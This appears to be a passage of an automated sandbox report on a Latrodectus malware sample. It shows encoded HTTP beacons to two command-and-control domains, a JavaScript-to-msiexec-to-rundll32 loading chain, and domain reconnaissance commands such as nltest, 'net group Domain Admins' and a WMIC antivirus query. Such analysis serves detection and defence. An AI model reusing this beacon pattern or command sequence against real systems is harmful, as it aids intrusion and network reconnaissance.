2024-04-26 21:25:30 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 2f 61 6d 73 64 31 42 57 32 69 30 71 70 6b 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RvBsnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX8/amsd1BW2i0qpkHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port
108	192.168.2.4	49858	104.21.59.82	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:25:34 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:25:34 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RvBsnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port
109	192.168.2.4	49859	172.67.197.34	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:25:38 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: pewwhranet.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:25:38 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 2f 61 6d 73 64 31 42 57 32 69 30 71 70 6b 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RvBsnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX8/amsd1BW2i0qpkHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port
110	192.168.2.4	49860	104.21.59.82	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:25:42 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:25:42 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RvBsnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port
111	192.168.2.4	49861	172.67.197.34	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:25:47 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: pewwhranet.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:25:47 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 2f 61 6d 73 64 31 42 57 32 69 30 71 70 6b 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RvBsnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX8/amsd1BW2i0qpkHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port
112	192.168.2.4	49862	104.21.59.82	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:25:51 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:25:51 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RvBsnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=

Target ID:	0
Start time:	23:16:27
Start date:	26/04/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document_a51_19i793302-14b09981a5569-3684u8.js"
Imagebase:	0x7ff79b420000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	23:16:29
Start date:	26/04/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff628170000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	23:16:31
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding B0AF98778AC35F634802E620BDCA3C21
Imagebase:	0xcf0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	23:16:31
Start date:	26/04/2024
Path:	C:\Windows\Installer\MSI181.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Installer\MSI181.tmp" C:/Windows/System32/rundll32.exe C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
Imagebase:	0x580000
File size:	399'328 bytes
MD5 hash:	B9545ED17695A32FACE8C3408A6A3553
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	23:16:31
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
Imagebase:	0xe30000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	23:16:31
Start date:	26/04/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
Imagebase:	0x7ff6b9320000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000005.00000002.1683586362.00000235B4340000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	23:16:32
Start date:	26/04/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_cd47bedf.dll", homq
Imagebase:	0x7ff6b9320000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000006.00000003.2983475717.000001800FE30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000006.00000003.2790656279.000001800FA60000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000006.00000003.2738493222.000001800FE30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000006.00000003.2983528800.000001800FE30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000006.00000003.2934278162.000001800FE30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000006.00000003.3043571681.000001800FE30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000006.00000003.2995791620.0000018010010000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000006.00000003.2856871010.000001800FA60000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000006.00000003.2656498432.000001800FA60000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	23:16:34
Start date:	26/04/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_cd47bedf.dll", homq
Imagebase:	0x7ff6b9320000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000007.00000002.1715800687.000001EF532A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000007.00000002.1715838763.000001EF532B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	23:16:35
Start date:	26/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	23:16:35
Start date:	26/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://473750571567004317064230583514468350804565684324378075159610742091604698238217701484029465762430135913242023857750034401559054060945654540273638867228794983640833862748912121851334807031249099092790952130035074227943842970399582505875/
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	23:16:36
Start date:	26/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1996,i,12555166688129216027,17064817212319626723,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	23:16:36
Start date:	26/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1952,i,10714614445797353568,16368385931931740060,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	23:18:34
Start date:	26/04/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	/c ipconfig /all
Imagebase:	0x7ff7cd330000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	19
Start time:	23:18:34
Start date:	26/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	23:18:34
Start date:	26/04/2024
Path:	C:\Windows\System32\ipconfig.exe
Wow64 process (32bit):	false
Commandline:	ipconfig /all
Imagebase:	0x7ff7ecb60000
File size:	35'840 bytes
MD5 hash:	62F170FB07FDBB79CEB7147101406EB8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	23:18:34
Start date:	26/04/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	/c systeminfo
Imagebase:	0x7ff7cd330000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	23:18:34
Start date:	26/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	23
Start time:	23:18:35
Start date:	26/04/2024
Path:	C:\Windows\System32\systeminfo.exe
Wow64 process (32bit):	false
Commandline:	systeminfo
Imagebase:	0x7ff62f970000
File size:	110'080 bytes
MD5 hash:	EE309A9C61511E907D87B10EF226FDCD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	25
Start time:	23:18:35
Start date:	26/04/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	26
Start time:	23:18:36
Start date:	26/04/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	/c nltest /domain_trusts
Imagebase:	0x7ff7cd330000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	27
Start time:	23:18:36
Start date:	26/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	28
Start time:	23:18:36
Start date:	26/04/2024
Path:	C:\Windows\System32\nltest.exe
Wow64 process (32bit):	false
Commandline:	nltest /domain_trusts
Imagebase:	0x7ff75fa00000
File size:	540'672 bytes
MD5 hash:	70E221CE763EA128DBA484B2E4903DE1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	29
Start time:	23:18:37
Start date:	26/04/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	/c nltest /domain_trusts /all_trusts
Imagebase:	0x7ff7cd330000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	30
Start time:	23:18:37
Start date:	26/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	31
Start time:	23:18:37
Start date:	26/04/2024
Path:	C:\Windows\System32\nltest.exe
Wow64 process (32bit):	false
Commandline:	nltest /domain_trusts /all_trusts
Imagebase:	0x7ff75fa00000
File size:	540'672 bytes
MD5 hash:	70E221CE763EA128DBA484B2E4903DE1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	32
Start time:	23:18:38
Start date:	26/04/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	/c net view /all /domain
Imagebase:	0x7ff7cd330000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	33
Start time:	23:18:38
Start date:	26/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	34
Start time:	23:18:38
Start date:	26/04/2024
Path:	C:\Windows\System32\net.exe
Wow64 process (32bit):	false
Commandline:	net view /all /domain
Imagebase:	0x7ff7243c0000
File size:	59'904 bytes
MD5 hash:	0BD94A338EEA5A4E1F2830AE326E6D19
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	35
Start time:	23:18:50
Start date:	26/04/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	/c net view /all
Imagebase:	0x7ff7cd330000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	36
Start time:	23:18:50
Start date:	26/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	37
Start time:	23:18:50
Start date:	26/04/2024
Path:	C:\Windows\System32\net.exe
Wow64 process (32bit):	false
Commandline:	net view /all
Imagebase:	0x7ff7243c0000
File size:	59'904 bytes
MD5 hash:	0BD94A338EEA5A4E1F2830AE326E6D19
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	38
Start time:	23:19:02
Start date:	26/04/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	/c net group "Domain Admins" /domain
Imagebase:	0x7ff7cd330000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	39
Start time:	23:19:02
Start date:	26/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	40
Start time:	23:19:03
Start date:	26/04/2024
Path:	C:\Windows\System32\net.exe
Wow64 process (32bit):	false
Commandline:	net group "Domain Admins" /domain
Imagebase:	0x7ff7243c0000
File size:	59'904 bytes
MD5 hash:	0BD94A338EEA5A4E1F2830AE326E6D19
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	41
Start time:	23:19:03
Start date:	26/04/2024
Path:	C:\Windows\System32\net1.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\net1 group "Domain Admins" /domain
Imagebase:	0x7ff7f5a10000
File size:	183'808 bytes
MD5 hash:	55693DF2BB3CBE2899DFDDF18B4EB8C9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	42
Start time:	23:19:03
Start date:	26/04/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	/Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Imagebase:	0x7ff716fe0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	43
Start time:	23:19:03
Start date:	26/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	44
Start time:	23:19:03
Start date:	26/04/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	/c net config workstation
Imagebase:	0x7ff7cd330000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	45
Start time:	23:19:03
Start date:	26/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	46
Start time:	23:19:04
Start date:	26/04/2024
Path:	C:\Windows\System32\net.exe
